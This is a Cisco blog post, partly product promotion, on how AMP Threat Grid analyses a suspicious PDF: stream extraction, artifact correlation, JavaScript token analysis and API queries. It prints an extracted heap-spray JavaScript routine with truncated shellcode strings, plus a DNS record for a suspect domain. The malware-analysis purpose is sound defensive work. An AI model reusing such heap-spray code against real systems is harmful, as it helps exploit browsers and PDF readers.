Avatar

As a result of Cisco’s acquisition last May, ThreatGRID is now part of the Cisco Advanced Malware Protection (AMP) portfolio as AMP Threat Grid. The acquisition expands Cisco AMP capabilities in the areas of dynamic analysis and threat intelligence technology, both on-premise and in the cloud. AMP Threat Grid extends Cisco AMP with even greater visibility, context, and control over sophisticated threats. Security analysts and incident response teams can augment their forensics analysis to detect and stop evasive attacks faster than ever.

AMP Threat Grid is not simply another dynamic analysis platform or sandbox. While the solution does leverage various dynamic analysis techniques and ‘sandboxing’ to produce content, it also acts as a content engine so that you can more quickly and easily extract insights from the data. AMP Threat Grid treats all of its analysis as content, making it available to the user via a portal or API. AMP Threat Grid also doesn’t stop at a single analysis technique; instead it applies multiple dynamic and static analysis engines to submitted samples – all produced disk, network, and memory artifacts – in order to generate as rich a source of data as possible.

To see the value of this approach let’s take a look at some examples of how AMP Threat Grid features work together to provide deeper insight into a suspicious PDF document submitted for analysis.

Through the AMP Threat Grid PDF Static Forensic module, PDF Object Stream contents are automatically identified and extracted. The stream contents are listed as artifacts in the form of [original filename].pdf[stream number]. The analysis engine is able to decode XFA data, as well as other payloads such as XDP, and then extract the decoded artifact. Each extracted Object is considered by AMP Threat Grid to be an Artifact and, based on the Object’s Filetype identification, undergoes a level of additional analysis.

 

Figure 1 PDF Static Indicators
Figure 1. PDF Static Indicators

All observable data that is produced through the analysis is used by the AMP Threat Grid team to create a Behavioral or Static Indicator. In the case of this PDF, content within the Object Streams are used to determine if the PDF is suspicious or not.

Figure 2 PDF Analysis Details
Figure 2. PDF Analysis Details

Each Object Stream is now considered an Artifact and so becomes a pivot point for further search and correlation. Drilling down into one of the Artifacts, a JavaScript Object, we can see the metadata, AV Signatures, Associated Paths, and Related Samples. The Related Samples table displays samples and artifacts that have been seen in the AMP Threat Grid database. This feature allows AMP Threat Grid to correlate samples that share shellcode, JavaScript, and other similarities.

Figure 3 Artifact Correlation
Figure 3. Artifact Correlation

Viewing the Artifact detail provides additional information about the stream. If JavaScript is found, it is run through the JavaScript Analysis. By viewing the Tokens produced, AMP Threat Grid can quickly determine if the code is malicious.

Figure 4 JavaScript Details
Figure 4. JavaScript Details

Finally, the Artifact Details panel allows you to download the Object Stream artifact for further analysis. An icon located on the top right of the window allows you to download the raw artifact data, which, in this case, is for Heap Spray code.

function lololo(sc,re)
{
var lala = unescape;
var new1 = sc.replace(re, “%u”);
var new2 = lala(new1);
return new2;
}
function getss(ssi, sssize)
{
while (ssi.length*2<sssize) ssi += ssi;
ssi = ssi.substring(0,sssize/2);
return ssi;
}
function hhh()
{
memory = new Array();
var payLoadCode = “XX01e8XX0000XX0000XX0c8bXX8324XX04c4….”;
var ll=”MM751fMMc0f8MM7475MM7575…..”;
var re1 = /XX/g;
var re2 = /MM/g;
payLoadCode = lololo(payLoadCode,re1) + lololo(ll,re2);
var plsize = payLoadCode.length * 2;
var sssize = 0x40000 – (plsize+0x38);
var ssi = “XX0C0CXX0C0CXX0C0CXX0C0C”;
ssi = lololo(ssi,re1);
ssi = getss(ssi,sssize);
var nnn=450;
for (i=0;i<nnn;i++)
{
memory[i] = ssi + payLoadCode;
}
}
hhh();

At this point an analyst can download or extract all the actionable content needed to respond to an incident. As previously mentioned, all the above steps can be performed through the AMP Threat Grid API, making it easy to identify the network streams associated with each sample. For example, in the output below DNS Requests and Responses were extracted by writing a simple query.

{
sample_id: “abe6babdcc910971e65b8367df5ac104″,
description: “Related to Incident # ….”,
timestamp: “2014-02-14T15:19:13Z”,
domain: “ganiopatia.ru”,
answer_type: “CNAME”,
ttl: “5520”,
answer: “cdn.entrust.net.c.footprint”
}

Being able to quickly determine the characteristics of a sample, its relationships, historical data, and all actionable indicators is critical for effective response. AMP Threat Grid provides innovative capabilities that speed up that process and make the analysis content and related data easily accessible to all members of your incident response team.

In my next post we’ll take a closer look at Indicators of Compromise and how AMP Threat Grid uses context to produce actionable content.



Authors

Eric Hulse

Sr Reverse Engineer

Advanced Threat Solutions – AMP Threat Grid